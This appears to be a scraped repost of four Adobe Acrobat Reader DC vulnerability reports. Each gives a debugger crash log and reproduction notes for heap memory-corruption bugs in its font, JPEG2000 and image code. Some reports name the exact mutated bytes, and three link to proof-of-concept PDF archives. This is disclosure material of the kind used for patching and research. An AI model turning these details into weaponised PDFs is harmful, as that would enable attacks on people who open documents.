ISHACK AI BOT

All posts by ISHACK AI BOT

  1. We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:

--- cut ---
(3fb8.2ac4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02c50000 ebx=57694ff0 ecx=00000004 edx=00111111 esi=57695010 edi=0000001b
eip=13b51c4e esp=668dd318 ebp=668dd378 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
CoolType!CTInit+0x6eec7:
13b51c4e 8906            mov     dword ptr [esi],eax  ds:002b:57695010=????????

0:018> !heap -p -a @esi-20
    address 57694ff0 found in
    _DPH_HEAP_ROOT @ 8e1000
    in busy allocation (  DPH_HEAP_BLOCK:  UserAddr  UserSize -  VirtAddr  VirtSize)
                             53ab2af8:  57694e40       1c0 -  57694000      2000
    66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
    7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
    7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
    7725ccee ntdll!RtlAllocateHeap+0x0000003e
    66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
    74a2f1f6 ucrtbase!_malloc_base+0x00000026
    11e5fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
    13ae74d4 CoolType!CTInit+0x0000474d
    13b50e2c CoolType!CTInit+0x0006e0a5
    13b507bf CoolType!CTInit+0x0006da38
    13b50736 CoolType!CTInit+0x0006d9af
    13b506c3 CoolType!CTInit+0x0006d93c
    13b5051c CoolType!CTInit+0x0006d795
    13b50398 CoolType!CTInit+0x0006d611
    13b5032b CoolType!CTInit+0x0006d5a4
    13b50208 CoolType!CTInit+0x0006d481
    13b1b3c0 CoolType!CTInit+0x00038639
    13b0036d CoolType!CTInit+0x0001d5e6
    13b01c20 CoolType!CTInit+0x0001ee99
    13b05eff CoolType!CTInit+0x00023178
    13b0036d CoolType!CTInit+0x0001d5e6
    13b01c20 CoolType!CTInit+0x0001ee99
    13b02229 CoolType!CTInit+0x0001f4a2
    13b05c4d CoolType!CTInit+0x00022ec6
    13b032ba CoolType!CTInit+0x00020533
    13b031b3 CoolType!CTInit+0x0002042c
    13b02ef7 CoolType!CTInit+0x00020170
    13b02d85 CoolType!CTInit+0x0001fffe
    13b0dad7 CoolType!CTInit+0x0002ad50
    13b0d96f CoolType!CTInit+0x0002abe8
    1201f455 AcroRd32!DllCanUnloadNow+0x00176495

0:018> kb
 # ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 668dd378 13b45405 13d88404 56842dcc 00000001 CoolType!CTInit+0x6eec7
01 668dd394 13b44548 13d88284 275aacb0 668ddb48 CoolType!CTInit+0x6267e
02 668dd3a4 13b50fa7 668dd3f4 13d90130 668dd3e8 CoolType!CTInit+0x617c1
03 668ddb48 13b507bf 56842dcc 668ddb6c 668ddc08 CoolType!CTInit+0x6e220
04 668ddc00 13b50736 43730ff8 668ddc4c 69db2fa8 CoolType!CTInit+0x6da38
05 668ddc14 13b506c3 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d9af
06 668ddc28 13b5051c 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d93c
07 668ddc6c 13b50398 668ddd4c cbb06bb8 668ddd10 CoolType!CTInit+0x6d795
08 668ddc98 13b5032b 668ddd4c cbb06be0 668ddd10 CoolType!CTInit+0x6d611
09 668ddcc0 13b50208 631bcff0 668ddd4c cbb06bd0 CoolType!CTInit+0x6d5a4
0a 668ddcf0 13b1b3c0 631bcff0 668ddd4c cbb069cc CoolType!CTInit+0x6d481
0b 668ddeec 13b0036d 56842d70 668ddf24 cbb06868 CoolType!CTInit+0x38639
0c 668ddf48 13b01c20 13d71918 00000001 00000000 CoolType!CTInit+0x1d5e6
0d 668ddf78 13b05eff 56842d70 13d71918 00000001 CoolType!CTInit+0x1ee99
0e 668ddfb4 13b0036d 56842d70 668ddfec cbb05730 CoolType!CTInit+0x23178
0f 668de010 13b01c20 13d719d0 00000001 00000000 CoolType!CTInit+0x1d5e6
10 668de040 13b02229 56842d70 13d719d0 00000001 CoolType!CTInit+0x1ee99
11 668de074 13b05c4d 13d719d0 58fb2fc8 00000004 CoolType!CTInit+0x1f4a2
12 668de0ac 13b032ba 27594fc0 cbb05290 668de698 CoolType!CTInit+0x22ec6
13 668de5b0 13b031b3 56842d70 27594fc0 668de610 CoolType!CTInit+0x20533
14 668de5e8 13b02ef7 56842d70 27594fc0 668de610 CoolType!CTInit+0x2042c
15 668de62c 13b02d85 668de700 00000000 56842d00 CoolType!CTInit+0x20170
16 668de66c 13b0dad7 668de700 27594fc0 00000000 CoolType!CTInit+0x1fffe
17 668de6c8 13b0d96f 668de700 27594fc0 6e865226 CoolType!CTInit+0x2ad50
18 668de718 1201f455 670f0f08 13d72280 6e865226 CoolType!CTInit+0x2abe8
19 668de73c 1201e4e2 6e865226 00000001 00000000 AcroRd32!DllCanUnloadNow+0x176495
1a 668dfaa4 1201a692 668dfbf0 57586f68 00000005 AcroRd32!DllCanUnloadNow+0x175522
1b 668dfc8c 1201a2fe 668dfca0 5e3fea98 00000000 AcroRd32!DllCanUnloadNow+0x1716d2
1c 668dfce0 1201655c 668dfd70 57586f68 00000000 AcroRd32!DllCanUnloadNow+0x17133e
1d 668dfd98 120093ed 20425f7b 00000000 5e3fea98 AcroRd32!DllCanUnloadNow+0x16d59c
1e 668dfe78 12032848 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
1f 668dfed0 12032647 00000000 00000000 120320d0 AcroRd32!DllCanUnloadNow+0x189888
20 668dff3c 12031fec 20425e67 12031540 5f050ff8 AcroRd32!DllCanUnloadNow+0x189687
21 668dff64 12031551 15777c58 12031540 668dff88 AcroRd32!DllCanUnloadNow+0x18902c
22 668dff74 73cf8674 5f050ff8 73cf8650 4348ebff AcroRd32!DllCanUnloadNow+0x188591
23 668dff88 77285e17 5f050ff8 c74bea74 00000000 KERNEL32!BaseThreadInitThunk+0x24
24 668dffd0 77285de7 ffffffff 772aad8d 00000000 ntdll!__RtlUserThreadStart+0x2f
25 668dffe0 00000000 12031540 5f050ff8 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---

Notes:

- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of an allocated buffer.
- Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file). We haven't been able to minimize the testcases as the PoC files are significantly mutated beyond simple bit flips.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47275.zip
  2. We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:

--- cut ---
(4c84.1e3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=13842768 ebx=14b6d730 ecx=1383e108 edx=13832820 esi=13832850 edi=14b6d92c
eip=1062a82e esp=1383def0 ebp=1383def8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
CoolType!CTInit+0x37aa7:
1062a82e 8902            mov     dword ptr [edx],eax  ds:002b:13832820=????????

0:022> u @eip-14
CoolType!CTInit+0x37a93:
1062a81a 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
1062a81d 8b571c          mov     edx,dword ptr [edi+1Ch]
1062a820 8b7720          mov     esi,dword ptr [edi+20h]
1062a823 035508          add     edx,dword ptr [ebp+8]
1062a826 8b4724          mov     eax,dword ptr [edi+24h]
1062a829 037508          add     esi,dword ptr [ebp+8]
1062a82c 03c6            add     eax,esi
1062a82e 8902            mov     dword ptr [edx],eax

0:022> ? poi(edi+1c)
Evaluate expression: -56136 = ffff24b8

0:022> ? poi(ebp+8)
Evaluate expression: 327418728 = 13840368

0:022> !heap -p -a 13840368
    address 13840368 found in
    _DPH_HEAP_ROOT @ bd61000
    in busy allocation (  DPH_HEAP_BLOCK:  UserAddr  UserSize -  VirtAddr  VirtSize)
                              bd639c0:  13840368    190c94 -  13840000    192000
    unknown!fillpattern
    66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
    7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
    7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
    7725ccee ntdll!RtlAllocateHeap+0x0000003e
    66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
    74a2f1f6 ucrtbase!_malloc_base+0x00000026
    0e96fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
    105f74d4 CoolType!CTInit+0x0000474d
    105f8888 CoolType!CTInit+0x00005b01
    106270cf CoolType!CTInit+0x00034348
    10626c61 CoolType!CTInit+0x00033eda
    106265a2 CoolType!CTInit+0x0003381b
    10623c6f CoolType!CTInit+0x00030ee8
    10621d55 CoolType!CTInit+0x0002efce
    106210e9 CoolType!CTInit+0x0002e362
    1062096c CoolType!CTInit+0x0002dbe5
    10620893 CoolType!CTInit+0x0002db0c
    645138e1 AGM!AGMInitialize+0x0002aab1

0:022> kb
 # ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 1383def8 1062a372 13840368 14b6d92c 13840368 CoolType!CTInit+0x37aa7
01 1383df6c 1062a296 1383e104 1383e034 00000001 CoolType!CTInit+0x375eb
02 1383df84 1062a277 1383e104 1383e034 16977160 CoolType!CTInit+0x3750f
03 1383df98 10629d00 1383e104 1383e034 16977160 CoolType!CTInit+0x374f0
04 1383dfb8 10629a71 1383e328 16977160 00000000 CoolType!CTInit+0x36f79
05 1383e158 10628ea7 16977160 108a00a0 1383e328 CoolType!CTInit+0x36cea
06 1383e3b4 10623e89 1383e6a8 1383e430 00000000 CoolType!CTInit+0x36120
07 1383e6d0 10621d55 00000001 00000000 00000000 CoolType!CTInit+0x31102
08 1383e7a0 106210e9 16d43ec0 00000009 1383e834 CoolType!CTInit+0x2efce
09 1383efb8 1062096c 188f40ec 1383efd0 188f40c8 CoolType!CTInit+0x2e362
0a 1383f038 10620893 188f40ec 188f40d4 393d9f99 CoolType!CTInit+0x2dbe5
0b 1383f070 645138e1 14c73e6c 188f40ec 10882280 CoolType!CTInit+0x2db0c
0c 1383f084 644ffb1e 188f40d4 644ffab0 1737c5f0 AGM!AGMInitialize+0x2aab1
0d 1383f098 644fe8e7 1737c5fc 649a09f8 00000001 AGM!AGMInitialize+0x16cee
0e 1383f0d0 6451041c 30146add 13db5c78 00000000 AGM!AGMInitialize+0x15ab7
0f 1383f17c 772fcd28 0ad60000 1383f1b0 66d6922c AGM!AGMInitialize+0x275ec
10 1383f190 00000000 66d69238 772fcd10 0ad64d80 ntdll!RtlReleaseStackTrace+0x18
--- cut ---

Notes:

- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-56136 in the above case).
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to three bytes at offsets 0x2bd4c, 0x2bd4d and 0x2d5b8 (0x00 => 0xff in all cases). These bytes reside inside of a TrueType font stream.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47276.zip
  3. We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:

--- cut ---
(2728.1fa8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=fffd6880 ebx=1738cc84 ecx=0000078c edx=00000045 esi=14cf3f68 edi=1b884158
eip=6445cee9 esp=050fcab0 ebp=050fcac0 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210283
JP2KLib!JP2KCopyRect+0x17ce9:
6445cee9 c6040100        mov     byte ptr [ecx+eax],0  ds:002b:fffd700c=??

0:000> kb
 # ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 050fcac0 6445cfea 1b884158 14cf3f68 1738cc84 JP2KLib!JP2KCopyRect+0x17ce9
01 050fcb24 6445b4ff 00000005 94f99e7b 00000003 JP2KLib!JP2KCopyRect+0x17dea
02 050fcb90 6445898e 00000005 94f998ff 00000000 JP2KLib!JP2KCopyRect+0x162ff
03 050fcd14 6444d2af 143ca8a0 ffffffff 00000005 JP2KLib!JP2KCopyRect+0x1378e
04 050fcd88 6444d956 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x80af
05 050fcdec 6444dc90 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8756
06 050fce10 64465e4a 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8a90
07 050fce70 0f07e12e 1738cc00 00000000 00000005 JP2KLib!JP2KImageDecodeTileInterleaved+0x2a
08 050fcefc 0f04701b 00000000 050fcfa8 050fcfbc AcroRd32!AX_PDXlateToHostEx+0x3200de
09 050fcff4 0ef5ae8d 050fd014 050fd024 013e3626 AcroRd32!AX_PDXlateToHostEx+0x2e8fcb
0a 050fd038 645ada8c 16881638 050fd0a4 d6cb512b AcroRd32!AX_PDXlateToHostEx+0x1fce3d
0b 050fd0b4 645ae053 050fd100 d6cb5173 00000000 AGM!AGMGetVersion+0x16e3c
0c 050fd0ec 6484fb4c 189c6b24 050fd100 fffffffd AGM!AGMGetVersion+0x17403
0d 050fd104 64529a32 050fd198 d6cb5457 17432d88 AGM!AGMGetVersion+0x2b8efc
0e 050fd5c8 645275d6 050fdad8 17432d88 050fda4c AGM!AGMInitialize+0x40c02
0f 050fda6c 64524133 050fdad8 17432d88 050fdc6c AGM!AGMInitialize+0x3e7a6
10 050fdc8c 64522370 174201d0 14a51c28 1741d3b8 AGM!AGMInitialize+0x3b303
11 050fde68 64520dec 174201d0 14a51c28 d6cb5f2b AGM!AGMInitialize+0x39540
12 050fdeb4 6454ffbf 174201d0 14a51c28 172b6718 AGM!AGMInitialize+0x37fbc
13 050fded8 6454fa3e 00000201 6454fb7f 14a51c28 AGM!AGMInitialize+0x6718f
14 050fdee0 6454fb7f 14a51c28 d6cb5ed3 172b6718 AGM!AGMInitialize+0x66c0e
15 050fdf1c 644f8c6b 050fdff0 00000000 ffffffff AGM!AGMInitialize+0x66d4f
16 050fdf70 0ebccc6c 050fdfac 0ebccc73 013e3982 AGM!AGMInitialize+0xfe3b
17 050fdf78 0ebccc73 013e3982 172b6718 050fdf58 AcroRd32!DllCanUnloadNow+0x183cac
18 050fdfb4 0ebda604 16625154 013e0602 16625128 AcroRd32!DllCanUnloadNow+0x183cb3
19 050fdfe8 0ebda037 18cc864c 102872cc 0ebda4d2 AcroRd32!DllCanUnloadNow+0x191644
1a 050fdff4 0ebda4d2 013e0602 16625128 00000001 AcroRd32!DllCanUnloadNow+0x191077
1b 050fe01c 0ebed46a 013e067e 00000000 16625128 AcroRd32!DllCanUnloadNow+0x191512
1c 050fe060 0ebd9b8e 013e06b2 14ed7a00 16625128 AcroRd32!CTJPEGDecoderRelease+0x25da
1d 050fe0ac 0ebd994f 013e06ea 14ed7a00 050fe19c AcroRd32!DllCanUnloadNow+0x190bce
1e 050fe0f4 0ebd97d3 050fe110 013e077e 050fe4cc AcroRd32!DllCanUnloadNow+0x19098f
1f 050fe160 0ebd9607 050fe19c 148c73c0 406e5380 AcroRd32!DllCanUnloadNow+0x190813
20 050fe1c0 0ebd7e7d 148c73c0 0ebdad20 050fe4cc AcroRd32!DllCanUnloadNow+0x190647
21 050fe2c0 0ebd78d2 050fe4cc 013e0512 16bd8918 AcroRd32!DllCanUnloadNow+0x18eebd
22 050fe30c 0ebd6d6d 050fe4cc 050fe4d4 013e0396 AcroRd32!DllCanUnloadNow+0x18e912
23 050fe588 0ebd6b7e 00000002 174dc6da 013e03fa AcroRd32!DllCanUnloadNow+0x18ddad
24 050fe5e4 0eb9628a 00000002 174dc6da 013e0e82 AcroRd32!DllCanUnloadNow+0x18dbbe
25 050fe89c 0eb95168 13f5d0b0 050fe930 050fe980 AcroRd32!DllCanUnloadNow+0x14d2ca
26 050fe9a0 0eb94375 13f5d0b0 050fead0 00000000 AcroRd32!DllCanUnloadNow+0x14c1a8
27 050feaf4 0eb934ba 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14b3b5
28 050feb54 0eb9334d 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a4fa
29 050feb74 0eb91f3c 13f5d0b0 050febf8 00000000 AcroRd32!DllCanUnloadNow+0x14a38d
2a 050fec2c 0eb91962 00000001 00000000 013e0a9a AcroRd32!DllCanUnloadNow+0x148f7c
2b 050fec84 0eb9177a 14743838 00000001 013e0af6 AcroRd32!DllCanUnloadNow+0x1489a2
2c 050fece8 0eb914ff 050feddc 013e0be2 173039e0 AcroRd32!DllCanUnloadNow+0x1487ba
2d 050fedfc 0ea566ec 173039e0 0ea56610 00000000 AcroRd32!DllCanUnloadNow+0x14853f
2e 050fee14 0ea5645f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd72c
2f 050fee30 7460e0bb 012d017c 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd49f
30 050fee5c 74618849 0ea563a0 012d017c 0000000f USER32!_InternalCallWinProc+0x2b
31 050fee80 7461b145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
32 050fef50 74608503 0ea563a0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
33 050fefb8 74608aa0 0d640350 00000000 0000000f USER32!DispatchClientMessage+0x1b3
34 050ff000 77291a6d 050ff01c 00000020 050ff080 USER32!__fnDWORD+0x50
35 050ff038 76e92d3c 746091ee 050ff0d0 fc29c28c ntdll!KiUserCallbackDispatcher+0x4d
36 050ff03c 746091ee 050ff0d0 fc29c28c 0ce80b78 win32u!NtUserDispatchMessage+0xc
37 050ff090 74608c20 f926321c 050ff0b4 0ea6da8b USER32!DispatchMessageWorker+0x5be
38 050ff09c 0ea6da8b 050ff0d0 0ce80b78 0ce80b78 USER32!DispatchMessageW+0x10
39 050ff0b4 0ea6d81e 050ff0d0 013e1736 0ce80b78 AcroRd32!DllCanUnloadNow+0x24acb
3a 050ff128 0ea6d6b4 013e177e 0ce80b78 00000000 AcroRd32!DllCanUnloadNow+0x2485e
3b 050ff160 0e9fc556 013e17ce 0ce69870 00000000 AcroRd32!DllCanUnloadNow+0x246f4
3c 050ff1d0 0e9fbf81 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x756
3d 050ff5f0 00af783d 0e9d0000 00af0000 0ce69870 AcroRd32!AcroWinMainSandbox+0x181
3e 050ff9bc 00bffd2a 00af0000 00000000 0c032f0a AcroRd32_exe+0x783d
3f 050ffa08 73cf8674 04f17000 73cf8650 f10c3998 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
40 050ffa1c 77285e17 04f17000 af8342f3 00000000 KERNEL32!BaseThreadInitThunk+0x24
41 050ffa64 77285de7 ffffffff 772aada9 00000000 ntdll!__RtlUserThreadStart+0x2f
42 050ffa74 00000000 00af1390 04f17000 00000000 ntdll!_RtlUserThreadStart+0x1b

0:000> !heap -p -a eax
    address fffd6880 found in
    _HEAP @ c030000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        ffe1a018 37a00 0000  [00]   ffe1a040   1bc858 - (busy VirtualAlloc)
        66d6c27a verifier!AVrfpDphNormalHeapAllocate+0x000000ba
        66d6a9fa verifier!AVrfDebugPageHeapAllocate+0x0000036a
        77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
        7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
        7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
        7725ccee ntdll!RtlAllocateHeap+0x0000003e
        66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
        74a2f1f6 ucrtbase!_malloc_base+0x00000026
        e9ffcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
        64468602 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000182
        64461432 JP2KLib!JP2KCopyRect+0x0001c232
        644616dd JP2KLib!JP2KCopyRect+0x0001c4dd
        644686c2 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000242
        6445ced4 JP2KLib!JP2KCopyRect+0x00017cd4
        6445cfea JP2KLib!JP2KCopyRect+0x00017dea
        6445b4ff JP2KLib!JP2KCopyRect+0x000162ff
        6445898e JP2KLib!JP2KCopyRect+0x0001378e
        6444d2af JP2KLib!JP2KCopyRect+0x000080af
        6444d956 JP2KLib!JP2KCopyRect+0x00008756
        6444dc90 JP2KLib!JP2KCopyRect+0x00008a90
        64465e4a JP2KLib!JP2KImageDecodeTileInterleaved+0x0000002a
        f07e12e AcroRd32!AX_PDXlateToHostEx+0x003200de
        f04701b AcroRd32!AX_PDXlateToHostEx+0x002e8fcb
        ef5ae8d AcroRd32!AX_PDXlateToHostEx+0x001fce3d
        645ada8c AGM!AGMGetVersion+0x00016e3c
        645ae053 AGM!AGMGetVersion+0x00017403
        6484fb4c AGM!AGMGetVersion+0x002b8efc
        64529a32 AGM!AGMInitialize+0x00040c02
        645275d6 AGM!AGMInitialize+0x0003e7a6
        64524133 AGM!AGMInitialize+0x0003b303
        64522370 AGM!AGMInitialize+0x00039540
        64520dec AGM!AGMInitialize+0x00037fbc
--- cut ---

Notes:

- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled.
- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to a single byte inside of a binary JP2 image stream. The mutated byte is at offset 0x264a67 and was changed from 0x00 to 0xFE.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47277.zip
  4. We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:

--- cut ---
(4970.179c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c0c0c0a0 ebx=00000000 ecx=c0c0c000 edx=c0c0c0a0 esi=66d6aa60 edi=00000000
eip=66d68718 esp=005bb01c ebp=005bb068 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210286
verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8:
66d68718 813abbbbcdab    cmp     dword ptr [edx],0ABCDBBBBh ds:002b:c0c0c0a0=????????

0:000> kb
 # ChildEBP RetAddr  Args to Child
00 005bb068 66d68835 009f1000 c0c0c0c0 00000000 verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8
01 005bb08c 66d68ab0 009f1000 c0c0c0c0 005bb124 verifier!AVrfpDphFindBusyMemory+0x15
02 005bb0a8 66d6aaf0 009f1000 c0c0c0c0 00001000 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
03 005bb0c4 77305359 009f0000 01000002 c0c0c0c0 verifier!AVrfDebugPageHeapFree+0x90
04 005bb134 7725ad86 c0c0c0c0 131a284b 00000000 ntdll!RtlDebugFreeHeap+0x3c
05 005bb290 7725ac3d 00000000 c0c0c0c0 005bb630 ntdll!RtlpFreeHeap+0xd6
06 005bb2e0 66e5aad0 009f0000 00000000 c0c0c0c0 ntdll!RtlFreeHeap+0x7cd
07 005bb2fc 74a2db1b 009f0000 00000000 c0c0c0c0 vrfcore!VfCoreRtlFreeHeap+0x20
08 005bb310 74a2dae8 c0c0c0c0 00000000 005bb330 ucrtbase!_free_base+0x1b
09 005bb320 12192849 c0c0c0c0 723baff0 005bc4cc ucrtbase!free+0x18
WARNING: Stack unwind information not available. Following frames may be wrong.
0a 005bb330 1282c991 c0c0c0c0 723baff0 12840782 AcroRd32!AcroWinMainSandbox+0x6a49
0b 005bc4cc 1283fa3b 726faf88 00000001 6d4befe8 AcroRd32!AX_PDXlateToHostEx+0x33e941
0c 005bc504 1283209f 5f3b4f54 5f3b4f54 7c2fcfb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21ab
0d 005bc518 12825007 7c2fcfb8 00000044 52842f80 AcroRd32!AX_PDXlateToHostEx+0x34404f
0e 005bc5cc 122257c9 5f3b4f54 6e87cfb0 12225730 AcroRd32!AX_PDXlateToHostEx+0x336fb7
0f 005bc5f0 122256c3 57050fd8 00000001 00000028 AcroRd32!DllCanUnloadNow+0x4c809
10 005bc610 1267215a 005bc634 57050fd8 00000028 AcroRd32!DllCanUnloadNow+0x4c703
11 005bc654 1235a3a8 c0010000 0000000c 57050fd8 AcroRd32!AX_PDXlateToHostEx+0x18410a
12 005bc9a8 123598e6 005bca04 7333ca98 c9eeee9e AcroRd32!DllCanUnloadNow+0x1813e8
13 005bc9e0 123597c1 005bca04 7333ca98 005bca70 AcroRd32!DllCanUnloadNow+0x180926
14 005bca4c 12358788 c0010000 0000000c 7333ca98 AcroRd32!DllCanUnloadNow+0x180801
15 005bceac 12355cd7 005bd1b0 5eb4e5ac c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8
16 005be68c 12355955 5eb4e5ac c0010000 0000000c AcroRd32!DllCanUnloadNow+0x17cd17
17 005be75c 123393ed c9eecf42 78356f78 00000000 AcroRd32!DllCanUnloadNow+0x17c995
18 005be83c 123381e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
19 005be888 1232b383 78356f78 00000000 00000000 AcroRd32!DllCanUnloadNow+0x15f228
1a 005be9fc 1232ac97 17822dbc 00000001 7f976ef8 AcroRd32!DllCanUnloadNow+0x1523c3
1b 005bea64 12328590 c9eecd9a 735a5e74 7f976ef8 AcroRd32!DllCanUnloadNow+0x151cd7
1c 005beae4 1232825a 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f5d0
1d 005beb20 123a6099 7f976ef8 7302cf40 735a5e44 AcroRd32!DllCanUnloadNow+0x14f29a
1e 005bebf8 123a57f9 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2b209
1f 005bec38 123a5717 6a53efc8 00000000 7302cf40 AcroRd32!CTJPEGDecoderRelease+0x2a969
20 005bec70 123a5669 00000000 7302cf40 005bedf0 AcroRd32!CTJPEGDecoderRelease+0x2a887
21 005bec8c 123a51ec 7302cf40 005bedf0 005bee08 AcroRd32!CTJPEGDecoderRelease+0x2a7d9
22 005bee54 123a4a8c 00000002 00000000 ffffffff AcroRd32!CTJPEGDecoderRelease+0x2a35c
23 005bf074 123a47d4 123a47a0 5f558f90 005bf0cc AcroRd32!CTJPEGDecoderRelease+0x29bfc
24 005bf084 121fed79 6abbb1b8 c9eed7b2 5dd08ff8 AcroRd32!CTJPEGDecoderRelease+0x29944
25 005bf0cc 121fe83d 000004df c9eed642 15c34fd8 AcroRd32!DllCanUnloadNow+0x25db9
26 005bf13c 121fe5d4 c9eed61a 15c34fd8 121fe560 AcroRd32!DllCanUnloadNow+0x2587d
27 005bf164 12194709 000004d3 00000000 12194270 AcroRd32!DllCanUnloadNow+0x25614
28 005bf180 7460e0bb 01340c64 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0x8909
29 005bf1ac 74618849 12194270 01340c64 00000113 USER32!_InternalCallWinProc+0x2b
2a 005bf1d0 7461b145 00000113 000004d3 00000000 USER32!InternalCallWinProc+0x20
2b 005bf2a0 746090dc 12194270 00000000 00000113 USER32!UserCallWinProcCheckWow+0x1be
2c 005bf30c 74608c20 7b28fd14 005bf330 121fda8b USER32!DispatchMessageWorker+0x4ac
2d 005bf318 121fda8b 005bf34c 15b4fdd8 15b4fdd8 USER32!DispatchMessageW+0x10
2e 005bf330 121fd81e 005bf34c c9eed4da 15b4fdd8 AcroRd32!DllCanUnloadNow+0x24acb
2f 005bf3a4 121fd6b4 c9eed4a2 15b4fdd8 00000000 AcroRd32!DllCanUnloadNow+0x2485e
30 005bf3dc 1218c556 c9eed332 1489eff8 00000000 AcroRd32!DllCanUnloadNow+0x246f4
31 005bf44c 1218bf81 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x756
32 005bf86c 00af783d 12160000 00af0000 1489eff8 AcroRd32!AcroWinMainSandbox+0x181
33 005bfc38 00bffd2a 00af0000 00000000 00a0b3ba AcroRd32_exe+0x783d
34 005bfc84 73cf8674 007e2000 73cf8650 386b17d8 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
35 005bfc98 77285e17 007e2000 131a663b 00000000 KERNEL32!BaseThreadInitThunk+0x24
36 005bfce0 77285de7 ffffffff 772aada6 00000000 ntdll!__RtlUserThreadStart+0x2f
37 005bfcf0 00000000 00af1390 007e2000 00000000 ntdll!_RtlUserThreadStart+0x1b
--- cut ---

Notes:

- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
- The crash occurs immediately after opening the PDF document, and is caused by passing an uninitialized value from the heap as an argument to the free() function. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
- Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file).
